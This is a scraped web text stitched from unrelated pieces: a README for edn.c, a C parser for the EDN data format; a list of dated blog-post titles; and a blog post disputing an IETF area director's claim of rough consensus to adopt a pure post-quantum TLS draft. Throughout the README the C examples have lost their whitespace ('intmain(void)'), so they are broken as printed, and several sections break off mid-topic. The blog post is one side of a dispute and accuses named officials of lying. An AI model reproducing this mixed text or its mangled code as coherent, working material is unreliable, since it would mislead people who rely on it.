edn.c: A fast, zero-copy EDN (Extensible Data Notation) reader written in C11 with SIMD acceleration
Extensible via tagged literals
:
#inst "2024-01-01"
,
#uuid "..."
—transform data at parse time with custom readers
Human-friendly
: Comments, flexible whitespace, designed to be readable and writable by both humans and programs
Language-agnostic
: Originally from Clojure, but useful anywhere you need rich, extensible data interchange
Why EDN over JSON?
More expressive types (keywords, symbols, sets), native extensibility through tags (no more
{"__type": "Date", "value": "..."}
hacks), and better support for configuration files and data interchange in functional programming environments.
Windows
(x86_64, ARM64) - NEON/SSE4.2 SIMD via MSVC/MinGW/Clang
WebAssembly
- SIMD128 support for browsers and Node.js
Build Library
Unix/macOS/Linux:
# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c
# Build static library (libedn.a)
make
# Run tests to verify build
make test
Windows:
# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c
# Build with CMake (works with MSVC, MinGW, Clang)
.\build.bat# Or use PowerShell script
.\build.ps1 -Test
# Compile your code
gcc -o myapp myapp.c -I/path/to/edn.c/include -L/path/to/edn.c -ledn
# Or add to your Makefile
CFLAGS += -I/path/to/edn.c/include
LDFLAGS += -L/path/to/edn.c -ledn
Option 2: Include source directly
Copy
include/edn.h
and all files from
src/
into your project and compile them together.
Quick Start
#include"edn.h"#include<stdio.h>intmain(void) {
constchar*input="{:name \"Alice\" :age 30 :languages [:clojure :rust]}";
// Read EDN stringedn_result_tresult=edn_read(input, 0);
if (result.error!=EDN_OK) {
fprintf(stderr, "Parse error at line %zu, column %zu: %s\n",
result.error_line, result.error_column, result.error_message);
return1;
}
// Access the parsed mapedn_value_t*map=result.value;
printf("Parsed map with %zu entries\n", edn_map_count(map));
// Look up a value by keyedn_result_tkey_result=edn_read(":name", 0);
edn_value_t*name_value=edn_map_lookup(map, key_result.value);
if (name_value!=NULL&&edn_type(name_value) ==EDN_TYPE_STRING) {
size_tlen;
constchar*name=edn_string_get(name_value, &len);
printf("Name: %.*s\n", (int)len, name);
}
// Clean up - frees all allocated memoryedn_free(key_result.value);
edn_free(map);
return0;
}
Output:
Parsed map with 3 entries
Name: Alice
Whitespace and Control Characters
EDN.C follows Clojure's exact behavior for whitespace and control character handling:
Whitespace Characters
The following characters act as
whitespace delimiters
(separate tokens):
Character
Hex
Name
Common Use
0x20
Space
Standard spacing
\t
0x09
Tab
Indentation
\n
0x0A
Line Feed (LF)
Unix line ending
\r
0x0D
Carriage Return (CR)
Windows line ending
\f
0x0C
Form Feed
Page break
\v
0x0B
Vertical Tab
Vertical spacing
,
0x2C
Comma
Optional separator
FS
0x1C
File Separator
Data separation
GS
0x1D
Group Separator
Data separation
RS
0x1E
Record Separator
Data separation
US
0x1F
Unit Separator
Data separation
Examples:
// All of these parse as vectors with 3 elements:edn_read("[1 2 3]", 0); // spacesedn_read("[1,2,3]", 0); // commasedn_read("[1\t2\n3]", 0); // tabs and newlinesedn_read("[1\f2\x1C3]", 0); // formfeed and file separator
Control Characters in Identifiers
Control characters
0x00-0x1F
(except whitespace delimiters) are
valid in identifiers
(symbols and keywords):
// Backspace in symbol - valid!edn_result_tr=edn_read("[\bfoo]", 0); // 1-element vectoredn_vector_count(r.value); // Returns 1edn_free(r.value);
// Control characters in middle of identifierconstcharinput[] = {'[', 'f', 'o', 'o', 0x08, 'b', 'a', 'r', ']', 0};
r=edn_read(input, sizeof(input) -1);
edn_vector_count(r.value); // Returns 1 (symbol: "foo\bbar")edn_free(r.value);
// Versus whitespace - separates into 2 elementsedn_result_tr2=edn_read("[foo\tbar]", 0); // Tab is whitespaceedn_vector_count(r2.value); // Returns 2 (symbols: "foo" and "bar")edn_free(r2.value);
Note on null bytes (
0x00
):
When using string literals with
strlen()
, null bytes will truncate the string. Always pass explicit length for data containing null bytes:
Get UTF-8 string data. Returns NULL if value is not a string.
Lazy decoding:
For strings without escapes, returns a pointer into the original input (zero-copy). For strings with escapes (
\n
,
\t
,
\"
, etc.), decodes and caches the result on first call.
Automatic Reduction:
Ratios are automatically reduced to lowest terms using the Binary GCD algorithm (Stein's algorithm):
6/9
→ Reduced to
2/3
100/25
→ Reduced to
4/1
→ Returns as integer
4
Restrictions:
Only decimal (base-10) integers supported for both numerator and denominator
Octal (base-8) integers supported keeping compatibility with Clojure where it is
incorrectly
interpreted as decimal integers with leading zeros.
Both numerator and denominator must fit in
int64_t
Denominator must be positive (negative denominators are rejected)
Denominator cannot be zero
No whitespace allowed around
/
Hex and binary notations not supported for ratios
Example:
// Parse ratioedn_result_tr=edn_read("22/7", 0);
if (r.error==EDN_OK&&edn_type(r.value) ==EDN_TYPE_RATIO) {
int64_tnum, den;
edn_ratio_get(r.value, &num, &den);
printf("Ratio: %lld/%lld\n", (long long)num, (long long)den);
// Output: Ratio: 22/7// Convert to double for approximationdoubleapprox;
edn_number_as_double(r.value, &approx);
printf("Approximation: %.10f\n", approx);
// Output: Approximation: 3.1428571429
}
edn_free(r.value);
// Automatic reductionedn_result_tr2=edn_read("3/6", 0);
int64_tnum2, den2;
edn_ratio_get(r2.value, &num2, &den2);
// num2 = 1, den2 = 2 (reduced from 3/6)edn_free(r2.value);
// Reduction to integeredn_result_tr3=edn_read("10/5", 0);
assert(edn_type(r3.value) ==EDN_TYPE_INT);
int64_tint_val;
edn_int64_get(r3.value, &int_val);
// int_val = 2 (10/5 reduced to 2/1, returned as integer)edn_free(r3.value);
// Negative ratiosedn_result_tr4=edn_read("-3/4", 0);
int64_tnum4, den4;
edn_ratio_get(r4.value, &num4, &den4);
// num4 = -3, den4 = 4 (numerator is negative, denominator is positive)edn_free(r4.value);
// Error: zero denominatoredn_result_tr5=edn_read("5/0", 0);
// r5.error == EDN_ERROR_INVALID_NUMBER// r5.error_message == "Ratio denominator cannot be zero"// Error: negative denominator (denominators must be positive)edn_result_tr6=edn_read("3/-4", 0);
// r6.error == EDN_ERROR_INVALID_NUMBER// r6.error_message == "Ratio denominator must be positive"// Error: hex not supportededn_result_tr7=edn_read("0x10/2", 0);
// Parses 0x10 as int, not as ratio
Build Configuration:
This feature is disabled by default. To enable it:
Make:
CMake:
cmake -DEDN_ENABLE_RATIO=ON ..
make
When disabled (default):
EDN_TYPE_RATIO
enum value is not available
edn_ratio_get()
function is not available
Note:
Ratios are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's clojure.edn parser.
See
test/test_numbers.c
for comprehensive ratio test examples.
Extended Integer Formats
EDN.C supports Clojure-style special integer formats for hexadecimal, octal, binary, and arbitrary radix numbers. These are
disabled by default
as they are not part of the base EDN specification.
DDDD
are the digits (0-9, A-Z, case-insensitive for bases > 10)
Build Configuration:
This feature is disabled by default. To enable it:
Make:
CMake:
cmake -DEDN_ENABLE_EXTENDED_INTEGERS=ON ..
make
When disabled (default):
Hexadecimal (
0xFF
), binary (
2r1010
), and radix notation (
36rZZ
) will fail to parse
Leading zeros are forbidden
: Numbers like
01
,
0123
,
0777
are rejected (per EDN spec)
Only
0
itself, or
0.5
,
0e10
(floats starting with zero) are allowed
Note:
Extended integer formats are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's reader.
See
test/test_numbers.c
for comprehensive extended integer format test examples.
Underscore in Numeric Literals
EDN.C supports underscores as visual separators in numeric literals for improved readability. This feature is
disabled by default
as it's not part of the base EDN specification.
Underscores are only allowed
between digits
(not at start, end, or adjacent to special characters)
Multiple consecutive underscores are allowed:
4____2
is valid
Not allowed adjacent to decimal point:
123_.5
or
123._5
are invalid
Not allowed before/after exponent marker:
123_e10
or
123e_10
are invalid
Not allowed before suffix:
123_N
or
123.45_M
are invalid
Works with negative numbers:
-1_234
→
-1234
Examples:
// Credit card number formattingedn_result_tr1=edn_read("1234_5678_9012_3456", 0);
int64_tval1;
edn_int64_get(r1.value, &val1);
// val1 = 1234567890123456edn_free(r1.value);
// Pi with digit groupingedn_result_tr2=edn_read("3.14_15_92_65_35_89_79", 0);
doubleval2;
edn_double_get(r2.value, &val2);
// val2 = 3.141592653589793edn_free(r2.value);
// Hex bytes (requires EXTENDED_INTEGERS=1)edn_result_tr3=edn_read("0xFF_EC_DE_5E", 0);
int64_tval3;
edn_int64_get(r3.value, &val3);
// val3 = 0xFFECDE5Eedn_free(r3.value);
// Large numbers with thousands separatorsedn_result_tr4=edn_read("1_000_000", 0);
int64_tval4;
edn_int64_get(r4.value, &val4);
// val4 = 1000000edn_free(r4.value);
// In collectionsedn_result_tr5=edn_read("[1_000 2_000 3_000]", 0);
// Three integers: 1000, 2000, 3000edn_free(r5.value);
Invalid examples:
// Underscore at start - parses as symboledn_read("_123", 0); // Symbol, not number// Underscore at endedn_read("123_", 0); // Error: EDN_ERROR_INVALID_NUMBER// Adjacent to decimal pointedn_read("123_.5", 0); // Error: EDN_ERROR_INVALID_NUMBERedn_read("123._5", 0); // Error: EDN_ERROR_INVALID_NUMBER// Before/after exponent markeredn_read("123_e10", 0); // Error: EDN_ERROR_INVALID_NUMBERedn_read("123e_10", 0); // Error: EDN_ERROR_INVALID_NUMBER// Before suffixedn_read("123_N", 0); // Error: EDN_ERROR_INVALID_NUMBERedn_read("123.45_M", 0); // Error: EDN_ERROR_INVALID_NUMBER
Build Configuration:
This feature is disabled by default. To enable it:
Make:
make UNDERSCORE_IN_NUMERIC=1
CMake:
cmake -DEDN_ENABLE_UNDERSCORE_IN_NUMERIC=ON ..
make
Combined with other features:
# Enable underscores with extended integers and ratios
make UNDERSCORE_IN_NUMERIC=1 EXTENDED_INTEGERS=1 RATIO=1
When disabled (default):
Numbers with underscores will fail to parse
The scanner will stop at the first underscore, treating it as an invalid number
Note:
Underscores in numeric literals are a common feature in modern programming languages (Java, Rust, Python 3.6+, etc.) but are not part of the official EDN specification. This feature is provided for convenience and readability.
See
test/test_underscore_numeric.c
for comprehensive test examples.
A reader function receives the wrapped value and transforms it into a new representation. On error, set
error_message
to a static string and return NULL.
Parse Options
typedefstruct {
edn_reader_registry_t*reader_registry; // Optional reader registryedn_value_t*eof_value; // Optional value to return on EOFedn_default_reader_mode_tdefault_reader_mode;
} edn_parse_options_t;
edn_result_tedn_read_with_options(constchar*input, size_tlength,
constedn_parse_options_t*options);
Parse options fields:
reader_registry
: Optional reader registry for tagged literal transformations
eof_value
: Optional value to return when EOF is encountered instead of an error
default_reader_mode
: Behavior for unregistered tags (see below)
Default reader modes:
EDN_DEFAULT_READER_PASSTHROUGH
: Return
EDN_TYPE_TAGGED
for unregistered tags (default)
EDN_DEFAULT_READER_UNWRAP
: Discard tag, return wrapped value
EDN_DEFAULT_READER_ERROR
: Fail with
EDN_ERROR_UNKNOWN_TAG
EOF Value Handling:
By default, when the parser encounters end-of-file (empty input, whitespace-only input, or after
#_
discard), it returns
EDN_ERROR_UNEXPECTED_EOF
. You can customize this behavior by providing an
eof_value
in the parse options:
// First, create an EOF sentinel valueedn_result_teof_sentinel=edn_read(":eof", 0);
// Configure parse options with EOF valueedn_parse_options_toptions= {
.reader_registry=NULL,
.eof_value=eof_sentinel.value,
.default_reader_mode=EDN_DEFAULT_READER_PASSTHROUGH
};
// Parse input that results in EOFedn_result_tresult=edn_read_with_options(" ", 3, &options);
// Instead of EDN_ERROR_UNEXPECTED_EOF, returns EDN_OK with eof_valueif (result.error==EDN_OK) {
// result.value == eof_sentinel.valueconstchar*name;
edn_keyword_get(result.value, NULL, NULL, &name, NULL);
// name == "eof"
}
// Clean upedn_free(eof_sentinel.value);
Reader Example
#include"edn.h"#include"../src/edn_internal.h"// For edn_arena_alloc// Reader that uppercases keywordsstaticedn_value_t*upper_reader(edn_value_t*value, edn_arena_t*arena,
constchar**error_message) {
if (edn_type(value) !=EDN_TYPE_KEYWORD) {
*error_message="#upper requires keyword";
returnNULL;
}
constchar*name;
size_tname_len;
edn_keyword_get(value, NULL, NULL, &name, &name_len);
// Allocate uppercase name in arenachar*upper= (char*)edn_arena_alloc(arena, name_len+1);
if (!upper) {
*error_message="Out of memory";
returnNULL;
}
for (size_ti=0; i<name_len; i++) {
charc=name[i];
upper[i] = (c >= 'a'&&c <= 'z') ? (c-32) : c;
}
upper[name_len] ='\0';
// Create new keyword valueedn_value_t*result=edn_arena_alloc_value(arena);
if (!result) {
*error_message="Out of memory";
returnNULL;
}
result->type=EDN_TYPE_KEYWORD;
result->as.keyword.name=upper;
result->as.keyword.name_length=name_len;
result->as.keyword.namespace=NULL;
result->as.keyword.ns_length=0;
result->arena=arena;
returnresult;
}
intmain(void) {
// Create registry and register readeredn_reader_registry_t*registry=edn_reader_registry_create();
edn_reader_register(registry, "upper", upper_reader);
// Parse with custom readeredn_parse_options_topts= {
.reader_registry=registry,
.default_reader_mode=EDN_DEFAULT_READER_PASSTHROUGH
};
edn_result_tr=edn_read_with_options("#upper :hello", 0, &opts);
if (r.error==EDN_OK) {
constchar*name;
size_tlen;
edn_keyword_get(r.value, NULL, NULL, &name, &len);
printf(":%.*s\n", (int)len, name); // Output: :HELLO
}
edn_free(r.value);
edn_reader_registry_destroy(registry);
return0;
}
See
examples/reader.c
for more complete examples including timestamp conversion, vector extraction, and namespaced tags.
Map Namespace Syntax
EDN.C supports Clojure's map namespace syntax extension, which allows you to specify a namespace that gets automatically applied to all non-namespaced keyword keys in a map.
This feature is disabled by default. To enable it:
Make:
make EXTENDED_CHARACTERS=1
CMake:
cmake -DEDN_ENABLE_EXTENDED_CHARACTERS=ON ..
make
When disabled (default):
\formfeed
and
\backspace
will fail to parse
\oNNN
will fail to parse
Standard character literals still work:
\newline
,
\tab
,
\space
,
\return
,
\uXXXX
, etc.
See
examples/example_extended_characters.c
for more details.
Metadata
EDN.C supports Clojure-style metadata syntax, which allows attaching metadata maps to values.
Syntax variants:
Map metadata
:
^{:key val} form
- metadata is the map itself
Keyword shorthand
:
^:keyword form
- expands to
{:keyword true}
String tag
:
^"string" form
- expands to
{:tag "string"}
Symbol tag
:
^symbol form
- expands to
{:tag symbol}
Vector param-tags
:
^[type1 type2] form
- expands to
{:param-tags [type1 type2]}
Chaining
: Multiple metadata can be chained:
^meta1 ^meta2 form
- metadata maps are merged from right to left.
Example:
#include"edn.h"#include<stdio.h>intmain(void) {
// Parse with keyword shorthandedn_result_tresult=edn_read("^:private my-var", 0);
if (result.error==EDN_OK) {
// Check if value has metadataif (edn_value_has_meta(result.value)) {
edn_value_t*meta=edn_value_meta(result.value);
// Metadata is always a mapprintf("Metadata entries: %zu\n", edn_map_count(meta));
// Look up specific metadata keyedn_result_tkey=edn_read(":private", 0);
edn_value_t*val=edn_map_lookup(meta, key.value);
// val will be boolean trueedn_free(key.value);
}
edn_free(result.value);
}
return0;
}
More examples:
// Map metadataedn_read("^{:doc \"A function\" :test true} my-fn", 0);
// String tagedn_read("^\"String\" [1 2 3]", 0);
// Expands to: ^{:tag "String"} [1 2 3]// Symbol tagedn_read("^Vector [1 2 3]", 0);
// Expands to: ^{:tag Vector} [1 2 3]// Vector param-tagsedn_read("^[String long _] my-fn", 0);
// Expands to: ^{:param-tags [String long _]} my-fn// Chained metadataedn_read("^:private ^:dynamic ^{:doc \"My var\"} x", 0);
// All metadata merged into one map
Supported value types:
Metadata can only be attached to:
Collections: lists, vectors, maps, sets
Tagged literals
Symbols
Note:
Metadata cannot be attached to scalar values (nil, booleans, numbers, strings, keywords).
API:
// Check if value has metadatabooledn_value_has_meta(constedn_value_t*value);
// Get metadata map (returns NULL if no metadata)edn_value_t*edn_value_meta(constedn_value_t*value);
Build Configuration:
This feature is disabled by default. To enable it:
Make:
CMake:
cmake -DEDN_ENABLE_METADATA=ON ..
make
When disabled (default):
^
is treated as a valid character in identifiers (symbols/keywords)
^test
parses as a symbol named "^test"
Metadata API functions are not available
Note:
Metadata is a Clojure language feature, not part of the official EDN specification. It's provided here for compatibility with Clojure's reader.
See
examples/example_metadata.c
for more details.
Text Blocks
Experimental feature
that adds Java-style multi-line text blocks with automatic indentation stripping to EDN. Requires
EDN_ENABLE_TEXT_BLOCKS
compilation flag (disabled by default).
Text blocks start with three double quotes followed by a newline (
"""\n
) and end with three double quotes (
"""
):
{:query""" SELECT * FROM users WHERE age > 21"""}
Features:
Automatic indentation stripping (common leading whitespace removed)
Closing
"""
position determines base indentation level
Closing on own line adds trailing newline, on same line doesn't
Trailing whitespace automatically removed from each line
Minimal escaping: only
\"""
to include literal triple quotes
Returns standard EDN string (no special type needed)
Example:
#include"edn.h"#include<stdio.h>intmain(void) {
constchar*input="{:sql \"\"\"\n"" SELECT * FROM users\n"" WHERE age > 21\n"" ORDER BY name\n"" \"\"\""}";
edn_result_tresult=edn_read(input, 0);
if (result.error==EDN_OK) {
edn_result_tkey=edn_read(":sql", 0);
edn_value_t*val=edn_map_lookup(result.value, key.value);
// Text block returns a regular string with indentation strippedsize_tlen;
constchar*sql=edn_string_get(val, &len);
printf("%s\n", sql);
// Output:// SELECT * FROM users// WHERE age > 21// ORDER BY nameedn_free(key.value);
edn_free(result.value);
}
return0;
}
Indentation Rules (Java JEP 378)
:
Find minimum indentation across all non-blank lines
Closing
"""
position also determines indentation
Strip that amount from each line
If closing
"""
is on its own line, add trailing
\n
This feature is disabled by default. To enable it:
Make:
CMake:
cmake -DEDN_ENABLE_TEXT_BLOCKS=ON ..
make
When disabled (default):
"""\n
pattern is parsed as a regular string
No automatic indentation processing
Note:
Text blocks are an experimental feature and not part of the official EDN specification.
See
examples/example_text_block.c
for more examples.
Examples
Interactive TUI Viewer
EDN.C includes an interactive terminal viewer for exploring EDN data:
# Build the TUI
make tui
# Explore data interactively
./examples/edn_tui data.edn
# Use arrow keys to navigate, Enter/Space to expand/collapse, q to quit
CLI Tool
EDN.C includes a command-line tool for parsing and pretty-printing EDN files:
# Build the CLI
make cli
# Parse and pretty-print a file
./examples/edn_cli data.edn
# Or from stdinecho'{:name "Alice" :age 30}'| ./examples/edn_cli
More examples available in the
examples/
directory.
Building
Standard Build (Unix/macOS/Linux)
# Build library (libedn.a)
make
# Build and run all tests
make test# Build and run single test
make test/test_numbers
./test/test_numbers
# Build with debug symbols and sanitizers (ASAN/UBSAN)
make DEBUG=1
# Run benchmarks
make bench # Quick benchmark
make bench-all # All benchmarks# Clean build artifacts
make clean
# Show build configuration
make info
Windows Build
EDN.C fully supports Windows with MSVC, MinGW, and Clang. Choose your preferred method:
Quick Start (CMake - Recommended):
# Using the provided build script
.\build.bat# Or with PowerShell
.\build.ps1 -Test
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
2024.10.28: The sins of the 90s:
Questioning a puzzling claim about mass surveillance. #attackers #governments #corporations #surveillance #cryptowars
2024.08.03: Clang vs. Clang:
You're making Clang angry. You wouldn't like Clang when it's angry. #compilers #optimization #bugs #timing #security #codescans
2024.06.12: Bibliography keys:
It's as easy as [1], [2], [3]. #bibliographies #citations #bibtex #votemanipulation #paperwriting
2016.06.07: The death of due process:
A few notes on technology-fueled normalization of lynch mobs targeting both the accuser and the accused. #ethics #crime #punishment
2016.03.15: Thomas Jefferson and Apple versus the FBI:
Can the government censor how-to books? What if some of the readers are criminals? What if the books can be understood by a computer? An introduction to freedom of speech for software publishers. #censorship #firstamendment #instructions #software #encryption
2015.02.18: Follow-You Printing:
How Equitrac's marketing department misrepresents and interferes with your work. #equitrac #followyouprinting #dilbert #officespaceprinter
2014.06.02: The Saber cluster:
How we built a cluster capable of computing 3000000000000000000000 multiplications per year for just 50000 EUR. #nvidia #linux #howto
2014.03.23: How to design an elliptic-curve signature system:
There are many choices of elliptic-curve signature systems. The standard choice, ECDSA, is reasonable if you don't care about simplicity, speed, and security. #signatures #ecc #elgamal #schnorr #ecdsa #eddsa #ed25519
2014.02.05: Entropy Attacks!
The conventional wisdom says that hash outputs can't be controlled; the conventional wisdom is simply wrong.
2025.11.23: NSA and IETF, part 3:
Dodging the issues at hand. #pqcrypto #hybrids #nsa #ietf #dodging
Normal practice
in deploying post-quantum cryptography is to deploy ECC+PQ.
IETF's TLS working group is standardizing ECC+PQ.
But IETF management is also non-consensually ramming a particular NSA-driven document
through the IETF process,
a "non-hybrid" document that adds
just PQ
as another TLS option.
Don't worry: we're standardizing cars with seatbelts.
Also, recognizing generous funding from the National Morgue Association,
we're going to standardize cars
without
seatbelts as another option,
ignoring the safety objections.
That's okay, right?
Last month I posted
part 1
of this story.
Today's
part 2
highlighted the corruption.
This blog post, part 3,
highlights the dodging in a particular posting at the beginning of this month
by an IETF "security area director".
Part 4
will give an example of how
dissent on this topic has been censored.
Consensus means whatever the people in power want to do.
Recall from my previous blog post that
"adoption" of a document is a preliminary step
before an IETF "working group" works on, and decides whether to standardize, the document.
In April 2025,
the chairs of the IETF TLS WG called for "adoption" of this NSA-driven document.
During the call period,
20 people expressed unequivocal support for adoption,
2 people expressed conditional support for adoption,
and 7 people expressed unequivocal opposition to adoption.
(
Details for verification.
)
Before the chairs could even reply,
an "area director"
interrupted
,
claiming, inter alia, the following:
"There is clearly consensus
based on the 67 responses to the adoption call. ...
The vast majority was in favour of adoption ...
There were a few dissenting opinions".
After these lies by the "area director" were
debunked
,
the chairs said that they had declared consensus
"because there is clearly sufficient interest to work on this draft"
specifically "enough people willing to review the draft".
I can understand not everybody being familiar with
the specific definition of "consensus" that
antitrust law
requires standards-development organizations to follow.
But it's astonishing to see chairs substituting a consensus-evaluation procedure
that simply ignores objections.
Stonewalling.
The chairs said I could escalate.
IETF procedures say that an unresolved dispute can be brought
"to the attention of the Area Director(s) for the area in which the Working Group is chartered",
and then "The Area Director(s) shall attempt to resolve the dispute".
I filed a complaint with the "security area directors"
in
early June 2025
.
One of them never replied.
The other,
the same one who had claimed that there was "clearly consensus",
sent a
series of excuses
for not handling the complaint.
For example, one excuse was that the PDF format "discourages participation".
Do IETF procedures say "The Area Director(s) shall attempt to resolve the dispute
unless the dispute is documented in a PDF"?
No.
I sent email two days later
systematically addressing the excuses.
The "area director" never replied.
It isn't clear under IETF procedures whether a non-reply allows an appeal.
It is, however, clear that an appeal
can't
be filed after two months.
I escalated to the "Internet Engineering Steering Group" (IESG)
in
August 2025
.
(These aren't even marginally independent groups.
The "area directors" are the IESG members.
IESG appoints the WG chairs.)
IESG didn't reply until October 2025.
It rejected one of the "Area Director" excuses for having ignored my complaint,
but endorsed another excuse.
I promptly filed a
revised complaint
with the "area director",
jumping through the hoops that IESG had set.
There were then further
runarounds
.
The switch.
Suddenly,
on 1 November 2025,
IESG publicly instructed the "area director" to address the following question:
"Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the
TLS Working Group appropriately called by the WG chairs?"
The "area director" posted his conclusion mere hours later:
"I agree with the TLS WG Chairs that the Adoption Call result
was that there was rough consensus to adopt the document".
Dodging procedural objections.
Before looking at how the "area director" argued for this conclusion,
I'd like to emphasize three things that the "area director"
didn't
do.
First,
did the "area director" address my
complaint
about the chair action on this topic?
No.
One reason this matters is that
the law requires standards-development organizations to provide an
"appeals process"
.
Structurally,
the "area director" isn't quoting and answering the points in my complaint;
the "area director" puts the entire burden on the reader
to try to figure out what's supposedly answering what,
and to realize that many points remain unanswered.
Second,
did the "area director" address the chairs claiming that
"we have consensus to adopt this draft"?
Or the previous claim from the "area director"
that there was "clearly consensus"?
No.
Instead IESG and this "area director"
quietly shifted from "consensus" to "rough consensus".
(Did you notice this shift when I quoted IESG's "rough consensus" instruction?)
One reason this matters is that
"consensus"
is another of the legal requirements for standards-development organizations.
The law doesn't allow "rough consensus".
Also,
IETF claims that
"decision-making requires achieving broad consensus"
.
"broad consensus" is even stronger than "consensus",
since it's saying that there's consensus
in a broad group
.
Third,
the way that my complaint had established the
lack of consensus
was, first, by reviewing the general definition of "consensus"
(which I paraphrased from the definition in the law, omitting a citation only because
the TLS chairs had threatened me with a
list ban
if I mentioned the law again),
and then applying the components of that definition to the situation at hand.
Did the area director follow this structure?
Here's the definition of "consensus", or "rough consensus" if we're switching to that,
and now let's apply that definition?
No.
Nobody reading this message from the "area director" can figure out what the "area director" believes these words mean.
Wow, look at that:
"due process"
is another of the legal requirements for standards-development organizations.
Part of due process is simply
making clear what procedures are being applied
.
Could it possibly be that the people writing the law
were thinking through how standardization processes could be abused?
Numbers.
Without further ado,
let's look at what the "security area director" did write.
The IESG has requested that I evaluate the WG Adoption call
results for ML-KEM Post-Quantum Key Agreement for TLS 1.3
(draft-connolly-tls-mlkem-key-agreement). Please see below.
As noted above,
IESG had instructed the "area director" to answer the following question:
"Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the
TLS Working Group appropriately called by the WG chairs?"
Side note:
Given that the "area director" posted all of the following
on the same day that IESG instructed the "area director" to write this,
presumably this was all written in advance and coordinated with the rest of IESG.
I guess the real point of finally (on 1 November 2025) addressing the adoption decision (from 15 April 2025)
was to try to provide cover for the "last call" a few days later (5 November 2025).
ExecSum
I agree with the TLS WG Chairs that the Adoption Call result
was that there was rough consensus to adopt the document.
As noted above,
the TLS WG chairs had claimed "consensus",
and the "area director" had claimed that there was "clearly consensus".
The "area director" is now quietly shifting to a weaker claim.
Timeline
April 1: Sean and Joe announce WG Adoption Call
[ about 40 messages sent in the thread ]
"About 40"?
What happened to the "area director" previously writing
"There is clearly consensus
based on the 67 responses to the adoption call"?
And why is the number of messages supposed to matter in the first place?
April 15: Sean announces the Adoption Call passed.
[ another 50 messages are sent in the thread ]
Messages after the specified adoption-call deadline can't justify the claim that
"the Adoption Call result was that there was rough consensus to adopt the document".
The adoption call
failed
to reach consensus.
April 18 to today: A chain of (attempted) Appeals by D. J. Bernstein to the
AD(s), IESG and IAB, parts of which are still in process.
The fact that the ADs and IESG stonewalled in response to complaints
doesn't mean that they were "attempted" complaints.
Outcome
30 people participated in the consensus call, 23 were in favour of
adoption, 6 against and 1 ambivalent (names included at the bottom of
this email).
These numbers are
much
closer to reality
than the "area director" previously writing
"There is clearly consensus
based on the 67 responses to the adoption call. ...
The vast majority was in favour of adoption ...
There were a few dissenting opinions".
Also, given that the "area director" is continually making claims that aren't true
(see examples below)
and seems generally allergic to providing evidence
(the text I'm quoting below has, amazingly,
zero
URLs),
it's a relief to see the "area director" providing names to back up the claimed numbers here.
But somehow, even after being
caught
lying about the numbers before,
the "area director" still can't resist shading the numbers a bit.
The actual numbers were
20 people unequivocally supporting adoption,
2 people conditionally supporting adoption,
and 7 people unequivocally opposing adoption.
Clearly 7 is close to 6, and 20+2 is close to 23, but, hmmm, not exactly.
Let's check the details:
How does the "area director" end up with 6 negative votes rather than 7?
By falsely listing Thomas Bellebaum as "ambivalent"
and falsely attributing a "prefer not, but okay if we do" position to Bellebaum.
In fact,
Bellbaum had
written
"I agree with Stephen on this one and would not support adoption of non-hybrids."
(This was in reply to Stephen Farrell,
who had written "I'm opposed to adoption, at this time.")
How does the "area director" end up with 23 positive votes rather than 22?
By falsely listing the document author (Deirdre Connolly) as having stated a pro-adoption position during the call.
The "area director" seems generally clueless about conflict-of-interest issues
and probably doesn't find it obvious that an author
shouldn't
vote,
but the simple fact is that the author
didn't
vote.
She
sent
three
messages
during the call period;
all of those messages are merely commenting on specific points,
not casting a vote on the adoption question.
The document author didn't object to the "area director" fudging the numbers.
Bellebaum did politely
object
;
the "area director"
didn't argue
,
beyond trying to save face with comments such as "Thanks for the clarification".
More to the point,
the "area director" has never explained
whether or how the tallies of positive and negative votes
are supposed to be relevant to the "rough consensus" claim.
The "area director" also hasn't commented on IETF
saying
that IETF doesn't make decisions by voting.
Bogus arguments for the draft.
I mentioned in my previous blog post that IETF
claims
that "IETF participants use their best engineering judgment to find the best solution for the whole Internet,
not just the best solution for any particular network, technology, vendor, or user".
In favour argument summary
While there is a lack of substantiating why adoption is desired - which
is typical
Okay,
the "area director"
seems to have some basic awareness
that this document flunks the "engineering judgment" criterion.
The "area director" tries to defend this by saying that other documents flunk too.
So confidence-inspiring!
- the big use case seems to be to support those parties relying
on NIST and FIPS for their security requirements.
Wrong.
Anything+PQ, and in particular ECC+PQ,
complies with NIST's standards when the PQ part does.
See
NIST SP 800-227
:
"This publication approves the use of the key combiner (14) for any t > 1 if at least one
shared secret (i.e., S
j
for some j) is generated from the key-establishment methods in SP
800-56A [1] or SP 800-56B [2] or an approved KEM."
For example, if the PQ part is ML-KEM as per FIPS 203,
then NIST allows ECC+PQ too.
What's next:
claiming that using PQ in an Internet protocol would violate NIST standards
unless NIST has standardized that particular Internet protocol?
This encompasses much
more than just the US government as other certification bodies and other
national governments have come to rely on the outcome of the NIST
competition,
which was the only public multi-year post-quantum cryptography effort
to evaluate the security of proposed new post-quantum algorithms.
I won't bother addressing the errors here,
since the bottom-line claim is orthogonal to the issue at hand.
The TLS WG already has an ECC+PQ document using NIST-approved PQ;
the question is whether to also have a document allowing the ECC seatbelt to be removed.
It
was also argued pure PQ has less complexity.
You know what would be even less complicated?
Encrypting with the null cipher!
There was a claim that PQ is less complex than ECC+PQ.
There was no response to
Andrey Jivsov
objecting that having a PQ option makes the ecosystem
more
complicated.
